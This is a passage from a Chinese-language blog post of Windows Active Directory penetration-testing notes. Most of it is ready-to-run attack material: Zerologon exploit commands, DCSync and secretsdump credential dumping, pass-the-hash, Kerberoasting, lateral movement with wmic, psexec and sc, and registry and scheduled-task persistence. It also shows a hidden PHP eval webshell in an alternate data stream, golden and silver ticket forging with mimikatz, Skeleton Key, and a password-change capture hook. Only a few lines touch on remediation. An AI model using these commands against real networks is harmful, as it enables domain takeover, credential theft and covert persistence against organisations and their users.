class="number">0</span>x05,<span class="number">0</span>x79,<span class="number">0</span>x90,<span class="number">0</span>x20,<span class="number">0</span>x9b,<span class="number">0</span>x09,<span class="number">0</span>xa4,<span class="number">0</span>x33,<span class="number">0</span>xb6,<span class="number">0</span>x6c,<span class="number">0</span>x1b)</span><br><span class="line"></span><br><span class="line">        <span class="comment">#Set IV to all nulls to prevent dynamic generation of IV value</span></span><br><span class="line">        <span class="variable">$AesIV</span> = <span class="built_in">New-Object</span> Byte[](<span class="variable">$AesObject</span>.IV.Length)</span><br><span class="line">        <span class="variable">$AesObject</span>.IV = <span class="variable">$AesIV</span></span><br><span class="line">        <span class="variable">$AesObject</span>.Key = <span class="variable">$AesKey</span></span><br><span class="line">        <span class="variable">$DecryptorObject</span> = <span class="variable">$AesObject</span>.CreateDecryptor()</span><br><span class="line">        [<span class="built_in">Byte</span>[]] <span class="variable">$OutBlock</span> = <span class="variable">$DecryptorObject</span>.TransformFinalBlock(<span class="variable">$Base64Decoded</span>, <span class="number">0</span>, <span class="variable">$Base64Decoded</span>.length)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> [<span class="type">System.Text.UnicodeEncoding</span>]::Unicode.GetString(<span class="variable">$OutBlock</span>)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">catch</span> &#123; <span class="built_in">Write-Error</span> <span class="variable">$Error</span>[<span class="number">0</span>] &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">Get-DecryptedCpassword</span> <span class="string">&quot;6s0v9qCdP8OcbP/xlB1XbNUdTDeC5NnDT196ZKinPsE&quot;</span>  <span class="comment"># 修改成相应的密码</span></span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -executionpolicy bypass -file Get-GPPPassword.ps1</span><br></pre></td></tr></table></figure>
<p><strong>修复建议</strong></p>
<p>使用PsPasswd批量修改域内主机本地管理员密码</p>
<h4 id="CVE-2020-1472-域内提权"><a href="#CVE-2020-1472-域内提权" class="headerlink" title="CVE-2020-1472 域内提权"></a>CVE-2020-1472 域内提权</h4><p>直接指向域控，so cool！</p>
<p><strong>工具</strong></p>
<p>重置域控用户名为空：<a target="_blank" rel="noopener" href="https://github.com/dirkjanm/CVE-2020-1472">https://github.com/dirkjanm/CVE-2020-1472</a></p>
<p>执行各种命令工具(sudo pip3 install .)：<a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket">https://github.com/SecureAuthCorp/impacket</a> </p>
<p>恢复域控密码：<a target="_blank" rel="noopener" href="https://github.com/risksense/zerologon">https://github.com/risksense/zerologon</a></p>
<p><strong>影响范围</strong></p>
<blockquote>
<p>Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)<br>Windows Server 2012<br>Windows Server 2012 (Server Core installation)<br>Windows Server 2012 R2<br>Windows Server 2012 R2 (Server Core installation)<br>Windows Server 2016<br>Windows Server 2016 (Server Core installation)<br>Windows Server 2019<br>Windows Server 2019 (Server Core installation)<br>Windows Server, version 1903 (Server Core installation)<br>Windows Server, version 1909 (Server Core installation)<br>Windows Server, version 2004 (Server Core installation)</p>
</blockquote>
<p>将域控密码设置为空</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python3 cve-2020-1472-exploit.py &lt;域控机器名&gt; &lt;域控IP&gt;</span><br><span class="line"></span><br><span class="line">python3 cve-2020-1472-exploit.py WIN-03OO218S5B8 192.168.0.4</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-20210131113629119.png" alt="image-20210131113629119"></p>
<p>通过 <code>Dcsync</code> 查看密码hash</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">secretsdump.py &lt;域&gt;&#x2F;&lt;域控机器名&gt;\$@&lt;域控IP&gt; -just-dc -no-pass</span><br><span class="line"></span><br><span class="line">secretsdump.py king.com&#x2F;WIN-03OO218S5B8\$@192.168.0.4 -just-dc -no-pass</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-20210131113844158.png" alt="image-20210131113844158"></p>
<p>通过<code>wmiexec.py</code>获取shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wmiexec.py king.com&#x2F;administrator@&lt;域控IP&gt; -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 king.com&#x2F;administrator@192.168.0.4</span><br><span class="line"></span><br><span class="line">或者</span><br><span class="line">wmiexec.py king.com&#x2F;administrator@&lt;域控IP&gt; -hashes aad3b435b51404eeaad3b435b51404ee:0d546438b1f4c396753b4fc8c8565d5b king.com&#x2F;administrator@192.168.0.4</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-20210131113948798.png" alt="image-20210131113948798"></p>
<p><strong>恢复密码</strong></p>
<p>工具：<a target="_blank" rel="noopener" href="https://github.com/risksense/zerologon">https://github.com/risksense/zerologon</a></p>
<p>在上面执行的cmd下执行如下命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># SHELL </span><br><span class="line">reg save HKLM\SYSTEM system.save</span><br><span class="line">reg save HKLM\SAM sam.save</span><br><span class="line">reg save HKLM\SECURITY security.save</span><br><span class="line">get system.save</span><br><span class="line">get sam.saveget security.save</span><br><span class="line">del &#x2F;f system.save</span><br><span class="line">del &#x2F;f sam.save</span><br><span class="line">del &#x2F;f security.save</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>
<p>然后利用 <code>secretsdump</code> 解析保存在本地的NT hash</p>
<p><img src="/images/image-20210131120225956.png" alt="image-20210131120225956"></p>
<p>记录下上面获取的数据，接下来使用上面提到的工具恢复hash</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR &lt;ORI_HASH&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-20210131120402995.png" alt="image-20210131120402995"></p>
<p>测试用空密码访问，已经失效了</p>
<p><img src="/images/image-20210131120434157.png" alt="image-20210131120434157"></p>
<h3 id="横向移动"><a href="#横向移动" class="headerlink" title="横向移动"></a>横向移动</h3><h4 id="SPN"><a href="#SPN" class="headerlink" title="SPN"></a>SPN</h4><p> cobalt strike</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell setspn -T test.com -Q *&#x2F;*   探测域内存活的相关服务</span><br></pre></td></tr></table></figure>
<p>导出票据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe &quot;kerberos::list &#x2F;export&quot;</span><br></pre></td></tr></table></figure>
<p>由于加密类型是RC4_HMAC_MD5，Kerberos协议第四步TGS-REP将会返回用服务帐户的NTLM密码哈希加密的票据。<br>使用字典进行暴力破解：（2.txt为字典）</p>
<p><a target="_blank" rel="noopener" href="https://github.com/nidem/kerberoast">https://github.com/nidem/kerberoast</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python tgsrepcrack.py 2.txt &quot;1-40a10000-linghuchong@MSSQLSvc~College-DS1~1433-COLLEGE.COM.kirbi&quot;</span><br></pre></td></tr></table></figure>
<h4 id="PTH"><a href="#PTH" class="headerlink" title="PTH"></a>PTH</h4><p>产生哈希传递原因：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/terminal/80186.html">https://www.freebuf.com/articles/terminal/80186.html</a>.</p>
<p>微软于2014年5月打了KB2871997补丁用来防范哈希传递，但是Administrator账号(SID为500)是例外的，使用该账户的NTLM Hash依然可以进行哈希传递</p>
<h4 id="WMI-回显"><a href="#WMI-回显" class="headerlink" title="WMI(回显)"></a>WMI(回显)</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exploit&#x2F;windows&#x2F;local&#x2F;wmi</span><br></pre></td></tr></table></figure>
<h4 id="wmic"><a href="#wmic" class="headerlink" title="wmic"></a>wmic</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wmic &#x2F;node:target_ip &#x2F;user:username &#x2F;password:password process call create c:\shell.bat</span><br><span class="line"></span><br><span class="line">wmic &#x2F;node:target_ip &#x2F;user:username &#x2F;password:password process call create &quot;cmd.exe &#x2F;c net user &amp;&amp; ipconfig&quot;</span><br><span class="line"></span><br><span class="line">wmic &#x2F;node:target_ip &#x2F;user:username &#x2F;password:password process call create &quot;cmd.exe &#x2F;c shell.exe&quot;</span><br></pre></td></tr></table></figure>
<h4 id="impackets"><a href="#impackets" class="headerlink" title="impackets"></a>impackets</h4><p><a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket.git">https://github.com/SecureAuthCorp/impacket.git</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python wmiexec.py -hash 000000000000000000000000000000:[ntlm hash] test&#x2F;administrator@target_ip &quot;whoami&quot;</span><br></pre></td></tr></table></figure>
<h4 id="psexec"><a href="#psexec" class="headerlink" title="psexec"></a>psexec</h4><p>需要远程系统开启<code>ADMIN$</code></p>
<p>在启动psexec建立连接，远程系统上会安装相应 的服务，因此会留下痕迹</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">psexec \\target_ip -u amdinistrator -p password cmd   返回终端</span><br><span class="line"></span><br><span class="line">psexec \\target_ip -u administrator -p password -s cmd &#x2F;c &quot;query user&quot;</span><br></pre></td></tr></table></figure>
<h4 id="IPC利用"><a href="#IPC利用" class="headerlink" title="IPC利用"></a>IPC利用</h4><p>135、445口开放</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">net user \\ip\ipc$ password &#x2F;user:username</span><br><span class="line"></span><br><span class="line">上传木马：</span><br><span class="line">copy shell.exe \\ip\c$\windows\temp\shell.exe</span><br><span class="line"></span><br><span class="line">命令执行</span><br><span class="line">psexec \\ip -u username -p password whoami</span><br><span class="line"></span><br><span class="line">cscript wmicexec.vbs &#x2F;cmd domain_name username password whoami</span><br><span class="line"></span><br><span class="line"># 服务 </span><br><span class="line">wmic &#x2F;node:ip &#x2F;user:username &#x2F;password:password process call create &quot;c:\windows\temp\shell.exe&quot;</span><br></pre></td></tr></table></figure>
<h4 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h4><p>schtasks</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>
<p>at</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>
<h4 id="启动服务"><a href="#启动服务" class="headerlink" title="启动服务"></a>启动服务</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 创建一个服务</span><br><span class="line">sc \\target_ip create WindowsUpdates binPath&#x3D; &quot;cmd.exe &#x2F;c start net user&quot;</span><br><span class="line"># 执行和删除</span><br><span class="line">sc \\target_ip start WindowsUpdates</span><br><span class="line">sc \\target_ip delete WindowsUpdates</span><br><span class="line"></span><br><span class="line"># 指定administrator账户创建一个 adminsec 的服务</span><br><span class="line">sc \\target_ip create adminsec binPath&#x3D; &quot;c:\shell.exe&quot; obj&#x3D;&quot;adminsec\administrator&quot; password&#x3D; adminsec</span><br><span class="line"></span><br><span class="line">sc \\target_ip start adminsec</span><br></pre></td></tr></table></figure>
<h2 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h2><h3 id="注册表启动项"><a href="#注册表启动项" class="headerlink" title="注册表启动项"></a>注册表启动项</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 查看当前的启动项</span><br><span class="line">REG query &quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</span><br><span class="line"></span><br><span class="line"># 添加一个启动项</span><br><span class="line">REG add &quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&quot; &#x2F;v [启动名字] &#x2F;d &quot;C:\Windows\Temp\shell.exe&quot; &#x2F;f</span><br><span class="line"></span><br><span class="line"># 删除启动项</span><br><span class="line">REG delete &quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&quot; &#x2F;v [启动名字] &#x2F;f</span><br></pre></td></tr></table></figure>
<h3 id="Windows计划任务"><a href="#Windows计划任务" class="headerlink" title="Windows计划任务"></a>Windows计划任务</h3><p>利用前提</p>
<ol>
<li>必须通过其他手段拿到本地或者域管理账号密码</li>
<li>若在横向渗透过程中，要保证当前机器能netuse远程到目标机器上</li>
<li>目标机器开启了taskscheduler服务</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#远程</span><br><span class="line">schtasks &#x2F;create &#x2F;s target_ip &#x2F;u &quot;administrator&quot; &#x2F;p &quot;password&quot; &#x2F;RL HIGHEST &#x2F;f &#x2F;tn &quot;windowsUpdate&quot; &#x2F;windows&#x2F;tmp&#x2F;bit.txt &#x2F;sc DAYLY &#x2F;mo 1 &#x2F;ST 20:15  ??</span><br><span class="line"></span><br><span class="line"># 本地</span><br><span class="line">schtasks &#x2F;create &#x2F;tn &quot;360&quot; &#x2F;tr C:\Windows\Temp\360.exe &#x2F;sc DAILY &#x2F;st 10:00</span><br><span class="line"></span><br><span class="line"># 查找</span><br><span class="line">schtasks &#x2F;query &#x2F;s target_ip &#x2F;U &quot;administrator&quot; &#x2F;P &quot;password&quot; | findstr &quot;windowsUpdates&quot;</span><br><span class="line"></span><br><span class="line"># 删除</span><br><span class="line">schtasks &#x2F;delete &#x2F;F &#x2F;tn WindowsUpdates &#x2F;s target_ip &#x2F;U &quot;administrator&quot; &#x2F;P &quot;password&quot; </span><br></pre></td></tr></table></figure>
<h3 id="多地登陆管理员账号"><a href="#多地登陆管理员账号" class="headerlink" title="多地登陆管理员账号"></a>多地登陆管理员账号</h3><p>查看注册表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\fSingleSessionPerUser</span><br></pre></td></tr></table></figure>
<p>1是不允许多地远程，</p>
<p>0,是允许，03以上的系统基本上默认都是为1不允许所以这里就需要我们更改这个</p>
<h3 id="隐藏文件"><a href="#隐藏文件" class="headerlink" title="隐藏文件"></a>隐藏文件</h3><h4 id="文件属性隐藏"><a href="#文件属性隐藏" class="headerlink" title="文件属性隐藏"></a>文件属性隐藏</h4><p>隐藏文件，这样只是简单的隐藏文件，在文件夹选项中勾选<code>显示隐藏的文件、文件夹或驱动器</code>就能显示隐藏文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">attrib +h eval.php</span><br></pre></td></tr></table></figure>
<p>打开电脑文件夹选项卡，取消<code>隐藏受保护的操作系统文件</code>勾选，把<code>隐藏文件和文件夹</code>下面的单选选择<code>显示隐藏的文件、文件夹和驱动器</code>。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">attrib +s +a +h +r eval.php</span><br></pre></td></tr></table></figure>
<h4 id="利用ADS隐藏"><a href="#利用ADS隐藏" class="headerlink" title="利用ADS隐藏"></a>利用ADS隐藏</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo ^&lt;?php @eval($_POST[&#39;cmd&#39;]); ?^&gt; &gt; index.php:hidden.jpg</span><br></pre></td></tr></table></figure>
<p>这样子就生成了一个不可见的<code>shell</code> <code>hidden.jpg</code>，常规的文件管理器、type命令，dir命令、del命令发现都找不出那个<code>hidden.jpg</code>的。　使用<code>notepad index.php:hidden.jpg</code> 修改文件 或者 使用<code>dir /r </code>查看文件。删除文件，直接删除<code>index.php</code>即可。</p>
<h4 id="驱动级文件隐藏"><a href="#驱动级文件隐藏" class="headerlink" title="驱动级文件隐藏"></a>驱动级文件隐藏</h4><p>使用工具：<a target="_blank" rel="noopener" href="http://www.xoslab.com/efl.html">Easy File Locker</a></p>
<p>如果你在网站目录未查找到相关文件，且系统目录存在存在以下文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">c:\WINDOWS\xlkfs.dat</span><br><span class="line">c:\WINDOWS\xlkfs.dll</span><br><span class="line">c:\WINDOWS\xlkfs.ini</span><br><span class="line">c:\WINDOWS\system32\drivers\xlkfs.sys</span><br></pre></td></tr></table></figure>
<p>清除</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、查询服务状态：sc qc xlkfs</span><br><span class="line">2、停止服务：net stop xlkfs    # 服务停止以后，经驱动级隐藏的文件即可显现</span><br><span class="line">3、删除服务：sc delete xlkfs</span><br><span class="line">4、删除系统下面文件，重启系统，确认服务已经被清除</span><br></pre></td></tr></table></figure>
<h3 id="SSP-Security-Support-Provider"><a href="#SSP-Security-Support-Provider" class="headerlink" title="SSP(Security Support Provider)"></a>SSP(Security Support Provider)</h3><p><strong>原理</strong></p>
<p><a target="_blank" rel="noopener" href="https://uknowsec.cn/posts/notes/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%9F%9F%E7%BB%B4%E6%9D%83.html">https://uknowsec.cn/posts/notes/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%9F%9F%E7%BB%B4%E6%9D%83.html</a></p>
<p><strong>利用</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">将mimikatz下的mimilib.dll 拷贝到 C:\windows\system32的目录下</span><br><span class="line"></span><br><span class="line">添加Security Packages</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-20210110181328115.png" alt="image-20210110181328115"></p>
<p>重启成功，如果有用户成功登录到当前系统中,会在 c:\windows\system32 目录下生成一个用于记录登账账号密码的 kiwissp.log 文件</p>
<h3 id="黄金票据"><a href="#黄金票据" class="headerlink" title="黄金票据"></a>黄金票据</h3><p>Golden Ticket是通过伪造的 TGT（TicketGranting Ticket），因为只要有了高权限的TGT，那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。</p>
<p><strong>条件</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、域名称</span><br><span class="line">2、域的SID值</span><br><span class="line">3、域的KRBTGT账户密码HASH</span><br><span class="line">4、伪造用户名，可以是任意的</span><br></pre></td></tr></table></figure>
<p>MSF 中使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"># 在msf中先steal_token一个域管理员的进程，然后才可以执行下面的命令。一开始使用&#96;impersonate_token&#96;获取的域管理员身份不起作用。</span><br><span class="line"></span><br><span class="line">meterpreter &gt; steal_token 1964</span><br><span class="line">Stolen token with username: KING\administrator</span><br><span class="line">meterpreter &gt; dcsync</span><br><span class="line">dcsync       dcsync_ntlm  </span><br><span class="line">meterpreter &gt; dcsync_ntlm krbtgt</span><br><span class="line">[+] Account   : krbtgt</span><br><span class="line">[+] NTLM Hash : 16a358115102a4351ee2240d7f983b23</span><br><span class="line">[+] LM Hash   : 8968fb93cc3e6143a62930984b756f62</span><br><span class="line">[+] SID       : S-1-5-21-1100079753-1400930603-3000301551-502</span><br><span class="line">[+] RID       : 502</span><br><span class="line"></span><br><span class="line"># 生成黄金票据，会存放在本地的攻击机系统中</span><br><span class="line"></span><br><span class="line">golden_ticket_create -u [任意用户名] -d [所在域] -s [SID去除最后三个] -k [krbtgt的ntlm哈希] -t [保存文件的路径和名字]</span><br><span class="line"></span><br><span class="line">meterpreter &gt; golden_ticket_create -u administrator -d king.com -s S-1-5-21-1100079753-1400930603-3000301551 -k 16a358115102a4351ee2240d7f983b23 -t golden.kiribi</span><br><span class="line"></span><br><span class="line"># 删除目标机器其他票据</span><br><span class="line">meterpreter &gt; kerberos_ticket_list</span><br><span class="line">meterpreter &gt; kerberos_ticket_purge</span><br><span class="line"></span><br><span class="line"># 注入票据</span><br><span class="line">meterpreter &gt; kerberos_ticket_use golden.kiribi    # 直接使用</span><br></pre></td></tr></table></figure>
<h3 id="白银票据"><a href="#白银票据" class="headerlink" title="白银票据"></a>白银票据</h3><p>主要是制作<code>ST</code>票据，不会<code>KDC</code>交流，直接发送到服务确认。每次制造的票据只能用于访问一个服务。</p>
<p>域管理员上收集信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 获取域控sid</span><br><span class="line">whoami &#x2F;user</span><br><span class="line"></span><br><span class="line"># 获取 ntlm 哈希、和主机名</span><br><span class="line">mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords&quot; &quot;exit&quot;&gt;log.txt</span><br></pre></td></tr></table></figure>
<p>在域用户上执行，会自动将票据注入。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe &quot;kerberos::golden &#x2F;domain:king.com &#x2F;sid:S-1-5-21-1100079753-1400930603-3000301551 &#x2F;target:WIN-8VSIF64RC10.king.com &#x2F;service:cifs &#x2F;rc4:&lt;1bd736c7b3fc68abd61863a15704a661 &#x2F;user:secquan &#x2F;ptt&quot;</span><br><span class="line"></span><br><span class="line">参数如下：</span><br><span class="line">domain:  域</span><br><span class="line">sid：    域管理员的sid</span><br><span class="line">target： 域控主机名+域</span><br><span class="line">service：要伪造服务票据</span><br><span class="line">rc4：    是 administrator$ 的ntlm哈希，不是 administrator 的哈希，也就是server的哈希</span><br><span class="line">user：   随便指定一个用户</span><br></pre></td></tr></table></figure>
<p>只要记录下域管理员的 主机名、服务的哈希、域管理员的sid，下次按需生成服务白银票据。</p>
<h3 id="检测域内密码修改"><a href="#检测域内密码修改" class="headerlink" title="检测域内密码修改"></a>检测域内密码修改</h3><p>工具：<a target="_blank" rel="noopener" href="https://github.com/Jumbo-WJB/Misc-Windows-Hacking">https://github.com/Jumbo-WJB/Misc-Windows-Hacking</a></p>
<p>只需要文件夹中的<code>HookPasswordChange.dll</code>和<code>Invoke-ReflectivePEInjection.ps1</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 导入包</span><br><span class="line">powershell.exe -ExecutionPolicy Bypass -File Invoke-ReflectivePEInjection.ps1</span><br><span class="line"></span><br><span class="line"># 然后修改密码，密码就会被保存在 C:\windows\temp\password.txt </span><br></pre></td></tr></table></figure>
<h3 id="Skeleton-Key"><a href="#Skeleton-Key" class="headerlink" title="Skeleton Key"></a>Skeleton Key</h3><p>Skeleton Key被安装在64位的域控服务器上,支持Windows Server2003到Windows Server2012 R2,能够让所有域用户使用同一个万能密码（默认密码为”mimikatz”）进行登录，现有的所有域用户使用原密码仍能继续登录，注意并不能更改用户权限。</p>
<p>由于 Skeleton Key 是被注入到 lsass.exe 进程的，所以它只存在于内存中，如果域控制器重启，注入的 Skeleton Key 将会失效。</p>
<p><strong>利用</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 在域控主机上运行 mimikatz</span><br><span class="line"></span><br><span class="line">privilege::debug</span><br><span class="line"></span><br><span class="line">misc::skeleton</span><br><span class="line"></span><br><span class="line"># 在域主机上</span><br><span class="line">net use \\[域控主机名].king.com\c$ mimikatz &#x2F;user:administrator@king.com</span><br><span class="line"></span><br><span class="line">这时候就能查看域控主机</span><br><span class="line">dir \\WIN-8VSIF64RC10.king.com\c$</span><br></pre></td></tr></table></figure>
<h3 id="域内委派攻击"><a href="#域内委派攻击" class="headerlink" title="域内委派攻击"></a>域内委派攻击</h3><p>委派功能只有<code>服务账号</code>和<code>主机账号</code>才有委派功能，普通域内用户或域控是没有的。</p>
<h4 id="非约束委派攻击"><a href="#非约束委派攻击" class="headerlink" title="非约束委派攻击"></a>非约束委派攻击</h4><p><strong>所需工具</strong>：<a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1</a></p>
<p><strong>原理</strong>：<code>用户</code>需要访问<code>主机1</code>上的<code>HTTP服务</code>，而<code>HTTP服务</code>需要请求其他主机的<code>SQLServer数据库</code>，但是<code>主机1</code>并不知道用户是否有权限访问<code>SQLServer</code>，这时<code>HTTP服务</code>会利用<code>用户的TGT</code>的身份去访问<code>KDC</code>，如果<code>用户</code>有权限访问<code>SQLServer服务</code>才能访问成功。这就是非约束委派的过程。实际上就是将用户自己的TGT委派了一个服务账号，该服务访问任何服务都会带上用户的TGT，因此会再服务机器上留下用户的TGT。</p>
<p>在域控上执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 导入工具</span><br><span class="line">Set-ExecutionPolicy Bypass -Scope Process -Force</span><br><span class="line">Import-Module .\PowerView.ps1</span><br><span class="line"></span><br><span class="line"># 查看非约束委派的用户</span><br><span class="line">Get-NetUser -Unconstrained -Domain king.com</span><br><span class="line"></span><br><span class="line"># 查看非约束委派的计算机</span><br><span class="line">Get-NetComputer -Unconstrained -Domain king.com</span><br><span class="line"></span><br><span class="line">把已经控制的主机用户设置为非约束委派，并且服务被其他主机访问的情况下才可继续利用</span><br></pre></td></tr></table></figure>
<p>在域内主机上用本地管理员登录，执行一下命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># 使用mimikatz导出主机中的所有凭证，找到如下的administrator的TGT凭证</span><br><span class="line">privilege::debug    </span><br><span class="line">sekurlsa::tickets &#x2F;export</span><br></pre></td></tr></table></figure>
